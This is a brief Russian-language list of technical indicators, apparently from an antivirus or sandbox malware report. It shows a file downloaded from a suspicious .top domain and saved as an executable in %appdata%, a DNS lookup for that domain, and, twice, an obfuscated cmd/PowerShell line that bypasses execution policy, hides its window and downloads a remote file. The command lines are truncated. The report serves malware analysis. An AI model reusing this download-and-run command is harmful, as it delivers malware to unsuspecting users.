Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwER^sh^elL^.^EXE -^eXE^cU^t^IoNpoL^i^cY ^BYPASS^ ^-nOPRofi^LE ^-^wIndoWSTylE hIDd^e^N^ (^NE^w-^O^bj^EcT SY^sT^eM.^n^Et.^W^E^Bc^LI^E^n^T^).^dOW^nl^OadfI^le('http://smoeroot...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "POwER^sh^elL^.^EXE -^eXE^cU^t^IoNpoL^i^cY ^BYPASS^ ^-nOPRofi^LE ^-^wIndoWSTylE hIDd^e^N^ (^NE^w-^O^bj^EcT SY^sT^eM.^n^Et.^W^E^Bc^LI^E^n^T^).^dOW^nl^OadfI^le('http://smoeroot...' (со скрытым окном)